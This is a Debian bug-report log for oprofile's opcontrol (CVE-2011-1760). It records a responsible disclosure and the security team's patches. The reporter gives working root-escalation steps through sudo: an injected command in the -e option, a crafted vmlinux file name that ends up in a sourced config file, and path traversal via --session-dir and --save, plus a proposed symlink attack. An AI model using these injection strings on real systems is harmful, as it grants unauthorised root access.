Debian Bug report logs - #624212
arbitrary command execution via sudo opcontrol

Package: oprofile; Maintainer for oprofile is LIU Qi <liuqi82@gmail.com>;

Reported by: Stephane Chauveau <stephane.chauveau@caps-entreprise.com>

Date: Tue, 26 Apr 2011 14:15:02 UTC

Severity: important

Tags: security

Found in versions oprofile/0.9.6-1.1, oprofile/0.9.6-1.3

Fixed in versions oprofile/0.9.6-1.4, oprofile/0.9.3-2+lenny2, oprofile/0.9.6-1.1+squeeze2

Done: Luciano Bello <luciano@debian.org>

Bug is archived. No further changes may be made.

Report forwarded to debian-bugs-dist@lists.debian.org, LIU Qi <liuqi82@gmail.com>:
Bug#624212; Package oprofile. (Tue, 26 Apr 2011 14:15:05 GMT)

Acknowledgement sent to Stephane Chauveau <stephane.chauveau@caps-entreprise.com>:
New Bug report received and forwarded. Copy sent to LIU Qi <liuqi82@gmail.com>. (Tue, 26 Apr 2011 14:15:05 GMT)

Message #5 received at submit@bugs.debian.org:

From: Stephane Chauveau <stephane.chauveau@caps-entreprise.com>
To: submit@bugs.debian.org
Subject: arbitrary command execution via sudo opcontrol
Date: Tue, 26 Apr 2011 16:06:43 +0200
Package: oprofile
Version: 0.9.6-1.1

I found a way to execute arbitrary commands when using opcontrol via
sudo. I realize that sudoing shell scripts is a bad idea (the oprofile
FAQ discourages the use of sudo) but sudo is nevertheless common
advice on the internet to provide oprofile to a user without giving him
full root access.

The problem is in the set_event function where the content of $2 is not 
checked.

set_event()
{
  eval "CHOSEN_EVENTS_$1=$2"
}

This error can be exploited by injecting commands via the -e option as 
in the following example:

$ sudo opcontrol -e "abcd;/usr/bin/id"
uid=0(root) gid=0(root) groups=0(root)
No such event "abcd"

This is a different vulnerability than
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0576
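
An added illustration of the set_event flaw reported above (not part of the original message and not the oprofile patch): the quoted function beside a validated form. The allowlisted alphabet, the sample event specification and every function name other than set_event are assumptions; the constructed input only sets a marker variable.

```shell
#!/bin/sh
# Added illustration, not oprofile code.

# Vulnerable form, as quoted in the report: $2 is expanded before eval
# parses the string, so shell metacharacters in it become syntax.
set_event_vulnerable()
{
  eval "CHOSEN_EVENTS_$1=$2"
}

# Hardened form:
#  - $1 must be a decimal index, because it becomes part of a variable name;
#  - $2 must match a conservative allowlist (assumed event-spec alphabet:
#    letters, digits, '_', ':', '.', '-');
#  - the value reaches eval as the literal text \$2, so eval performs one
#    plain assignment and never re-parses the content of the argument.
set_event_checked()
{
  case $1 in
    ''|*[!0-9]*) echo "invalid event index" >&2; return 1 ;;
  esac
  case $2 in
    ''|*[!A-Za-z0-9_:.-]*) echo "invalid event specification" >&2; return 1 ;;
  esac
  eval "CHOSEN_EVENTS_$1=\$2"
}

# Constructed input: the assignment after ';' stands in for an arbitrary
# command and only sets a marker variable.
SAMPLE='abcd;MARKER=injected'

probe_vulnerable()   # prints the marker after the vulnerable call
{
  MARKER=clean
  set_event_vulnerable 0 "$SAMPLE"
  echo "$MARKER"
}

probe_checked()      # prints the marker after the validated call
{
  MARKER=clean
  set_event_checked 0 "$SAMPLE" 2>/dev/null || true
  echo "$MARKER"
}

printf 'vulnerable: marker=%s\n' "$(probe_vulnerable)"
printf 'checked:    marker=%s\n' "$(probe_checked)"
```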










Severity set to 'important' from 'normal' Request was from Luciano Bello <luciano@debian.org> to control@bugs.debian.org. (Fri, 29 Apr 2011 14:42:02 GMT)

Added tag(s) security. Request was from Luciano Bello <luciano@debian.org> to control@bugs.debian.org. (Fri, 29 Apr 2011 14:42:03 GMT)

Information forwarded to debian-bugs-dist@lists.debian.org, LIU Qi <liuqi82@gmail.com>:
Bug#624212; Package oprofile. (Tue, 03 May 2011 01:21:02 GMT)

Acknowledgement sent to Stephane Chauveau <stephane@chauveau-central.net>:
Extra info received and forwarded to list. Copy sent to LIU Qi <liuqi82@gmail.com>. (Tue, 03 May 2011 01:21:02 GMT)

Message #14 received at 624212@bugs.debian.org:

From: Stephane Chauveau <stephane@chauveau-central.net>
To: 624212@bugs.debian.org
Subject: More ways to execute root commands
Date: Tue, 03 May 2011 03:11:28 +0200

I just found 2 more ways to execute arbitrary commands via sudo opcontrol.

################# Method 1 ##################

The problem is in the function do_save_setup() where multiple values
are saved in the shell script /root/.oprofile/daemonrc.

That file is sourced in do_load_setup() by later invocations of opcontrol.

The function do_save_setup() does not sanitize the values and thus
allows do_load_setup() to execute arbitrary commands.

There is even a comment in do_load_setup that indicates that the method
is known to be insecure.

Here is a possible method using the --vmlinux option:

(1) create a fake vmlinux file with a 'malformed' name

#  touch "$HOME/abcd;id"

(2) start the oprofile daemon using that vmlinux file. This creates the 
daemonrc file

# sudo opcontrol   --vmlinux="$HOME/aaaa;id"

(3) Any invocation of opcontrol will now source the malformed daemonrc 
file as root.

# sudo opcontrol   --stop
uid=0(root) gid=0(root) groups=0(root)
Daemon not running

(4) The daemonrc file can be cleared with

# sudo opcontrol   --no-vmlinux

The same trick can probably be used with the --session-dir and --xen 
options.

################# Method 2 ##################

The --save=name option moves samples/current to samples/name in the
current session directory.

A proper combination of --session-dir and --save can be used to copy a
file to any location.

The following example shows how to create a file /etc/XXX:

(1) Create a 'samples' directory

# mkdir -p /tmp/xxx/samples

(2) Create a file named 'current' in that directory

# echo "my_commands" > /tmp/xxx/samples/current

(3) Set the oprofile session directory to the root of the 'samples' 
directory

# sudo opcontrol --session-dir=/tmp/xxx

(4)  Execute --save with a path relative to the 'current' file

#  sudo opcontrol --save=../../../etc/XXX
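
An added illustration for the two methods in the message above (not part of the original message and not oprofile code): a settings file read as data instead of being sourced, and a check that a --save name is a single path component. The key names VMLINUX and SESSION_DIR and all function names are assumptions; the constructed value only sets a marker variable.

```shell
#!/bin/sh
# Added illustration, not oprofile code.

# Pattern described in the report: raw values are written into a shell
# script that a later, privileged invocation sources.
save_setup_raw()   # $1 = file, $2 = vmlinux path
{
  printf 'VMLINUX=%s\n' "$2" > "$1"
}

load_setup_by_sourcing()   # $1 = file
{
  . "$1"
}

# Alternative: read the file as KEY=VALUE data. Only known keys are
# accepted, and the value reaches eval as the literal text \$value, so its
# content is assigned and never parsed as shell syntax.
load_setup_as_data()   # $1 = file
{
  while IFS= read -r line || [ -n "$line" ]; do
    case $line in
      ''|'#'*) continue ;;
      *=*) ;;
      *) echo "skipping malformed line" >&2; continue ;;
    esac
    key=${line%%=*}
    value=${line#*=}
    case $key in
      VMLINUX|SESSION_DIR) eval "$key=\$value" ;;
      *) echo "skipping unknown key: $key" >&2 ;;
    esac
  done < "$1"
}

# Method 2: a --save name must be one path component, so it cannot leave
# the samples directory through '/' or '..'.
valid_save_name()   # $1 = name
{
  case $1 in
    ''|.|..|*/*) return 1 ;;
  esac
  return 0
}

# Constructed input: the assignment after ';' stands in for an arbitrary
# command and only sets a marker variable.
probe()   # $1 = loader function; prints "<MARKER>|<VMLINUX>"
{
  tmp=$(mktemp) || return 1
  save_setup_raw "$tmp" '/home/user/aaaa;MARKER=injected'
  MARKER=clean
  VMLINUX=
  "$1" "$tmp"
  rm -f "$tmp"
  echo "$MARKER|$VMLINUX"
}

echo "sourced: $(probe load_setup_by_sourcing)"
echo "as data: $(probe load_setup_as_data)"
```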













Information forwarded to debian-bugs-dist@lists.debian.org, LIU Qi <liuqi82@gmail.com>:
Bug#624212; Package oprofile. (Tue, 03 May 2011 09:12:04 GMT)

Acknowledgement sent to Stephane Chauveau <stephane.chauveau@caps-entreprise.com>:
Extra info received and forwarded to list. Copy sent to LIU Qi <liuqi82@gmail.com>. (Tue, 03 May 2011 09:12:06 GMT)

Message #19 received at 624212@bugs.debian.org:

From: Stephane Chauveau <stephane.chauveau@caps-entreprise.com>
To: 624212@bugs.debian.org
Subject: One more method
Date: Tue, 03 May 2011 11:02:54 +0200

I do not have a working example yet but I believe that privileges can
also be escalated with the following method.

The problem is the following command in do_dump_data

  echo do_jitconv > $SESSION_DIR/opd_pipe

SESSION_DIR can be controlled by the --session-dir option so a malicious
user could very well replace the fifo $SESSION_DIR/opd_pipe by a
symbolic link.

In theory it becomes possible to create an arbitrary file containing the
text "do_jitconv".

I am not a security expert but I am pretty sure that this is enough to
obtain root privileges, for example by creating a custom entry in
/etc/ld.so.conf.d/

Generally speaking, allowing sudoers to change the oprofile session 
directory without any controls is probably a very bad idea. The feature 
is probably needed to avoid disk quota issues so an etc configuration 
file listing all possible session directories could be the solution.
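
An added sketch of the mitigation suggested in the message above (not part of the original message and not oprofile code): a session directory is accepted only if it is listed in an allowlist file, and opd_pipe is accepted only if it is a FIFO that is not a symbolic link. The allowlist format (one absolute directory per line) and all function names are assumptions; the fixtures are constructed in a temporary directory.

```shell
#!/bin/sh
# Added illustration, not oprofile code.

# Accept $1 only if it is an absolute path with no '.' or '..' component
# and appears verbatim as a whole line in the allowlist file $2.
session_dir_allowed()
{
  case $1 in
    /*) ;;
    *) return 1 ;;
  esac
  case $1/ in
    */./*|*/../*) return 1 ;;
  esac
  grep -Fxq -- "$1" "$2"
}

# Accept $1 only if it is a FIFO and not a symbolic link. test -p follows
# symlinks, so a link pointing at a FIFO needs the separate -L check.
pipe_is_real_fifo()
{
  [ ! -L "$1" ] && [ -p "$1" ]
}

# Gate for the write performed in do_dump_data. The check-then-write
# sequence is only sound when the allowlisted directories are writable by
# root alone; in a user-writable directory the pipe can be swapped after
# the check.
dump_target_ok()   # $1 = session dir, $2 = allowlist file
{
  session_dir_allowed "$1" "$2" && pipe_is_real_fifo "$1/opd_pipe"
}

verdict()   # run a check, print "accept" or "reject"
{
  if "$@"; then echo accept; else echo reject; fi
}

# Constructed fixtures in a temporary directory.
demo()
{
  base=$(mktemp -d) || return 1
  mkdir "$base/ok" "$base/other"
  printf '%s\n' "$base/ok" > "$base/allowed.conf"
  mkfifo "$base/ok/opd_pipe"
  : > "$base/other/file"
  ln -s "$base/other/file" "$base/other/opd_pipe"     # link to a regular file
  ln -s "$base/ok/opd_pipe" "$base/other/fifo_link"   # link to a real FIFO

  echo "listed=$(verdict dump_target_ok "$base/ok" "$base/allowed.conf")"
  echo "unlisted=$(verdict dump_target_ok "$base/other" "$base/allowed.conf")"
  echo "dotdot=$(verdict session_dir_allowed "$base/other/../ok" "$base/allowed.conf")"
  echo "link_to_file=$(verdict pipe_is_real_fifo "$base/other/opd_pipe")"
  echo "link_to_fifo=$(verdict pipe_is_real_fifo "$base/other/fifo_link")"
  rm -rf "$base"
}

demo
```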






Reply sent to Luciano Bello <luciano@debian.org>:
You have taken responsibility. (Sat, 21 May 2011 04:51:04 GMT)

Notification sent to Stephane Chauveau <stephane.chauveau@caps-entreprise.com>:
Bug acknowledged by developer. (Sat, 21 May 2011 04:51:04 GMT)

Message #24 received at 624212-close@bugs.debian.org:

From: Luciano Bello <luciano@debian.org>
To: 624212-close@bugs.debian.org
Subject: Bug#624212: fixed in oprofile 0.9.6-1.2
Date: Sat, 21 May 2011 04:47:23 +0000
Source: oprofile
Source-Version: 0.9.6-1.2

We believe that the bug you reported is fixed in the latest version of
oprofile, which is due to be installed in the Debian FTP archive:

oprofile-gui_0.9.6-1.2_amd64.deb
  to main/o/oprofile/oprofile-gui_0.9.6-1.2_amd64.deb
oprofile_0.9.6-1.2.diff.gz
  to main/o/oprofile/oprofile_0.9.6-1.2.diff.gz
oprofile_0.9.6-1.2.dsc
  to main/o/oprofile/oprofile_0.9.6-1.2.dsc
oprofile_0.9.6-1.2_amd64.deb
  to main/o/oprofile/oprofile_0.9.6-1.2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 624212@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Luciano Bello <luciano@debian.org> (supplier of updated oprofile package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


Format: 1.8
Date: Fri, 20 May 2011 01:38:53 -0300
Source: oprofile
Binary: oprofile oprofile-gui
Architecture: source amd64
Version: 0.9.6-1.2
Distribution: unstable
Urgency: high
Maintainer: LIU Qi <liuqi82@gmail.com>
Changed-By: Luciano Bello <luciano@debian.org>
Description: 
 oprofile   - system-wide profiler for Linux systems
 oprofile-gui - system-wide profiler for Linux systems (GUI components)
Closes: 624212 625060
Changes: 
 oprofile (0.9.6-1.2) unstable; urgency=high
 .
   * Non-maintainer upload.
   * Add patch by William Cohen to not use mutable for reference variable
     (Closes: #625060)
   * Add patches by William Cohen to fix argument sanitation, CVE-2011-1760.
     This fixes the arbitrary command execution via opcontrol. (Closes: #624212)





Reply sent to Luciano Bello <luciano@debian.org>:
You have taken responsibility. (Sat, 04 Jun 2011 14:00:03 GMT)

Notification sent to Stephane Chauveau <stephane.chauveau@caps-entreprise.com>:
Bug acknowledged by developer. (Sat, 04 Jun 2011 14:00:03 GMT)

Message #29 received at 624212-close@bugs.debian.org:

From: Luciano Bello <luciano@debian.org>
To: 624212-close@bugs.debian.org
Subject: Bug#624212: fixed in oprofile 0.9.3-2+lenny1
Date: Sat, 04 Jun 2011 13:56:39 +0000
Source: oprofile
Source-Version: 0.9.3-2+lenny1

We believe that the bug you reported is fixed in the latest version of
oprofile, which is due to be installed in the Debian FTP archive:

oprofile-gui_0.9.3-2+lenny1_amd64.deb
  to main/o/oprofile/oprofile-gui_0.9.3-2+lenny1_amd64.deb
oprofile_0.9.3-2+lenny1.dsc
  to main/o/oprofile/oprofile_0.9.3-2+lenny1.dsc
oprofile_0.9.3-2+lenny1.tar.gz
  to main/o/oprofile/oprofile_0.9.3-2+lenny1.tar.gz
oprofile_0.9.3-2+lenny1_amd64.deb
  to main/o/oprofile/oprofile_0.9.3-2+lenny1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Format: 1.8
Date: Sat, 21 May 2011 11:59:50 -0300
Source: oprofile
Binary: oprofile oprofile-gui
Architecture: source amd64
Version: 0.9.3-2+lenny1
Distribution: oldstable-security
Urgency: high
Maintainer: Al Stone <ahs3@debian.org>
Changed-By: Luciano Bello <luciano@debian.org>
Description: 
 oprofile   - system-wide profiler for Linux systems
 oprofile-gui - system-wide profiler for Linux systems (GUI components)
Closes: 624212
Changes: 
 oprofile (0.9.3-2+lenny1) oldstable-security; urgency=high
 .
   * Non-maintainer upload by the Security Team.
   * Add patches by William Cohen to fix argument sanitation, CVE-2011-1760.
     This fixes the arbitrary command execution via opcontrol. (Closes: #624212)





Reply sent to Luciano Bello <luciano@debian.org>:
You have taken responsibility. (Sat, 04 Jun 2011 14:00:05 GMT)

Notification sent to Stephane Chauveau <stephane.chauveau@caps-entreprise.com>:
Bug acknowledged by developer. (Sat, 04 Jun 2011 14:00:06 GMT)

Message #34 received at 624212-close@bugs.debian.org:

From: Luciano Bello <luciano@debian.org>
To: 624212-close@bugs.debian.org
Subject: Bug#624212: fixed in oprofile 0.9.6-1.1+squeeze1
Date: Sat, 04 Jun 2011 13:56:46 +0000
Source: oprofile
Source-Version: 0.9.6-1.1+squeeze1

We believe that the bug you reported is fixed in the latest version of
oprofile, which is due to be installed in the Debian FTP archive:

oprofile-gui_0.9.6-1.1+squeeze1_amd64.deb
  to main/o/oprofile/oprofile-gui_0.9.6-1.1+squeeze1_amd64.deb
oprofile_0.9.6-1.1+squeeze1.diff.gz
  to main/o/oprofile/oprofile_0.9.6-1.1+squeeze1.diff.gz
oprofile_0.9.6-1.1+squeeze1.dsc
  to main/o/oprofile/oprofile_0.9.6-1.1+squeeze1.dsc
oprofile_0.9.6-1.1+squeeze1_amd64.deb
  to main/o/oprofile/oprofile_0.9.6-1.1+squeeze1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Format: 1.8
Date: Fri, 20 May 2011 18:00:08 -0300
Source: oprofile
Binary: oprofile oprofile-gui
Architecture: source amd64
Version: 0.9.6-1.1+squeeze1
Distribution: stable-security
Urgency: high
Maintainer: LIU Qi <liuqi82@gmail.com>
Changed-By: Luciano Bello <luciano@debian.org>
Description: 
 oprofile   - system-wide profiler for Linux systems
 oprofile-gui - system-wide profiler for Linux systems (GUI components)
Closes: 624212
Changes: 
 oprofile (0.9.6-1.1+squeeze1) stable-security; urgency=high
 .
   * Non-maintainer upload by the Security Team.
   * Add patches by William Cohen to fix argument sanitation, CVE-2011-1760.
     This fixes the arbitrary command execution via opcontrol. (Closes: #624212)





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 03 Jul 2011 07:33:33 GMT)

Bug unarchived. Request was from Luciano Bello <luciano@debian.org> to control@bugs.debian.org. (Sat, 09 Jul 2011 01:09:02 GMT)

Bug No longer marked as fixed in versions oprofile/0.9.6-1.2, oprofile/0.9.3-2+lenny1, and oprofile/0.9.6-1.1+squeeze1 and reopened. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sat, 09 Jul 2011 01:09:03 GMT)

Bug Marked as found in versions oprofile/0.9.6-1.3. Request was from Luciano Bello <luciano@debian.org> to control@bugs.debian.org. (Sat, 09 Jul 2011 03:21:03 GMT)

Reply sent to Luciano Bello <luciano@debian.org>:
You have taken responsibility. (Mon, 11 Jul 2011 15:21:07 GMT)

Notification sent to Stephane Chauveau <stephane.chauveau@caps-entreprise.com>:
Bug acknowledged by developer. (Mon, 11 Jul 2011 15:21:08 GMT)

Message #47 received at 624212-close@bugs.debian.org:

From: Luciano Bello <luciano@debian.org>
To: 624212-close@bugs.debian.org
Subject: Bug#624212: fixed in oprofile 0.9.6-1.4
Date: Mon, 11 Jul 2011 15:17:56 +0000
Source: oprofile
Source-Version: 0.9.6-1.4

We believe that the bug you reported is fixed in the latest version of
oprofile, which is due to be installed in the Debian FTP archive:

oprofile-gui_0.9.6-1.4_amd64.deb
  to main/o/oprofile/oprofile-gui_0.9.6-1.4_amd64.deb
oprofile_0.9.6-1.4.diff.gz
  to main/o/oprofile/oprofile_0.9.6-1.4.diff.gz
oprofile_0.9.6-1.4.dsc
  to main/o/oprofile/oprofile_0.9.6-1.4.dsc
oprofile_0.9.6-1.4_amd64.deb
  to main/o/oprofile/oprofile_0.9.6-1.4_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Format: 1.8
Date: Sat, 09 Jul 2011 19:54:57 -0300
Source: oprofile
Binary: oprofile oprofile-gui
Architecture: source amd64
Version: 0.9.6-1.4
Distribution: unstable
Urgency: high
Maintainer: LIU Qi <liuqi82@gmail.com>
Changed-By: Luciano Bello <luciano@debian.org>
Description: 
 oprofile   - system-wide profiler for Linux systems
 oprofile-gui - system-wide profiler for Linux systems (GUI components)
Closes: 624212
Changes: 
 oprofile (0.9.6-1.4) unstable; urgency=high
 .
   * Non-maintainer upload.
   * Jamie Strandboge noticed an uncomplete fix for CVE-2011-1760 Closes: #624212





Reply sent to Luciano Bello <luciano@debian.org>:
You have taken responsibility. (Sun, 17 Jul 2011 01:57:05 GMT)

Notification sent to Stephane Chauveau <stephane.chauveau@caps-entreprise.com>:
Bug acknowledged by developer. (Sun, 17 Jul 2011 01:57:05 GMT)

Message #52 received at 624212-close@bugs.debian.org:

From: Luciano Bello <luciano@debian.org>
To: 624212-close@bugs.debian.org
Subject: Bug#624212: fixed in oprofile 0.9.3-2+lenny2
Date: Sun, 17 Jul 2011 01:55:21 +0000
Source: oprofile
Source-Version: 0.9.3-2+lenny2

We believe that the bug you reported is fixed in the latest version of
oprofile, which is due to be installed in the Debian FTP archive:

oprofile-gui_0.9.3-2+lenny2_amd64.deb
  to main/o/oprofile/oprofile-gui_0.9.3-2+lenny2_amd64.deb
oprofile_0.9.3-2+lenny2.dsc
  to main/o/oprofile/oprofile_0.9.3-2+lenny2.dsc
oprofile_0.9.3-2+lenny2.tar.gz
  to main/o/oprofile/oprofile_0.9.3-2+lenny2.tar.gz
oprofile_0.9.3-2+lenny2_amd64.deb
  to main/o/oprofile/oprofile_0.9.3-2+lenny2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Format: 1.8
Date: Fri, 08 Jul 2011 21:11:54 -0300
Source: oprofile
Binary: oprofile oprofile-gui
Architecture: source amd64
Version: 0.9.3-2+lenny2
Distribution: oldstable-security
Urgency: low
Maintainer: Al Stone <ahs3@debian.org>
Changed-By: Luciano Bello <luciano@debian.org>
Description: 
 oprofile   - system-wide profiler for Linux systems
 oprofile-gui - system-wide profiler for Linux systems (GUI components)
Closes: 624212
Changes: 
 oprofile (0.9.3-2+lenny2) oldstable-security; urgency=low
 .
   * Non-maintainer upload by the Security Team.
   * Jamie Strandboge noticed an uncomplete fix for CVE-2011-1760 Closes: #624212





Reply sent to Luciano Bello <luciano@debian.org>:
You have taken responsibility. (Tue, 19 Jul 2011 01:57:07 GMT)

Notification sent to Stephane Chauveau <stephane.chauveau@caps-entreprise.com>:
Bug acknowledged by developer. (Tue, 19 Jul 2011 01:57:07 GMT)

Message #57 received at 624212-close@bugs.debian.org:

From: Luciano Bello <luciano@debian.org>
To: 624212-close@bugs.debian.org
Subject: Bug#624212: fixed in oprofile 0.9.6-1.1+squeeze2
Date: Tue, 19 Jul 2011 01:54:45 +0000
Source: oprofile
Source-Version: 0.9.6-1.1+squeeze2

We believe that the bug you reported is fixed in the latest version of
oprofile, which is due to be installed in the Debian FTP archive:

oprofile-gui_0.9.6-1.1+squeeze2_amd64.deb
  to main/o/oprofile/oprofile-gui_0.9.6-1.1+squeeze2_amd64.deb
oprofile_0.9.6-1.1+squeeze2.diff.gz
  to main/o/oprofile/oprofile_0.9.6-1.1+squeeze2.diff.gz
oprofile_0.9.6-1.1+squeeze2.dsc
  to main/o/oprofile/oprofile_0.9.6-1.1+squeeze2.dsc
oprofile_0.9.6-1.1+squeeze2_amd64.deb
  to main/o/oprofile/oprofile_0.9.6-1.1+squeeze2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Format: 1.8
Date: Fri, 08 Jul 2011 21:02:50 -0300
Source: oprofile
Binary: oprofile oprofile-gui
Architecture: source amd64
Version: 0.9.6-1.1+squeeze2
Distribution: stable-security
Urgency: low
Maintainer: LIU Qi <liuqi82@gmail.com>
Changed-By: Luciano Bello <luciano@debian.org>
Description: 
 oprofile   - system-wide profiler for Linux systems
 oprofile-gui - system-wide profiler for Linux systems (GUI components)
Closes: 624212
Changes: 
 oprofile (0.9.6-1.1+squeeze2) stable-security; urgency=low
 .
   * Non-maintainer upload by the Security Team.
   * Jamie Strandboge noticed an uncomplete fix for CVE-2011-1760 Closes: #624212





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Thu, 29 Dec 2011 07:32:41 GMT)


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Thu Apr 17 01:52:09 2014; Machine Name: beach.debian.org
